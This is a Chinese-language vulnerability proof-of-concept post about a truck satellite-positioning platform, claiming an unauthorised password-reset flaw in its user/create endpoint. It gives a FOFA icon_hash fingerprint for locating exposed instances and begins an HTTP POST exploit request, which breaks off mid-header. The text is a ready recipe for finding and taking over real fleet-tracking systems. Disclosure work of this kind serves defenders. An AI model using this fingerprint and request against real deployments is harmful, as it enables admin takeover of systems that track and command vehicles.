0x01 产品简介

卡车卫星定位系统是一种基于卫星通信和导航技术的系统，用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间，可以确定接收器（即卡车上的定位设备）所在的位置。具有高精度、高可靠性、全球覆盖等特点，因此在交通领域有广泛的应用。具体来说，它可以为卡车提供实时、准确的定位信息，帮助驾驶员规划行驶路线、避免迷路或走错路。同时，交通管理部门可以通过卫星定位系统对卡车进行监管，确保车辆按照规定路线行驶，防止违规行驶和交通事故的发生。此外，卡车卫星定位系统还可以用于车辆防盗、行驶路线监控及呼叫指挥等功能，提高车辆的安全性和管理效率。

0x02 漏洞概述

卡车卫星定位系统 user/create 接口存在未授权密码重置漏洞，远程攻击者可利用此漏洞获取后台管理权限，使系统处于极不安全的状态。

0x03 复现环境

FOFA：icon_hash="1553867732"

0x04 漏洞复现

PoC

POST /user/create HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: ap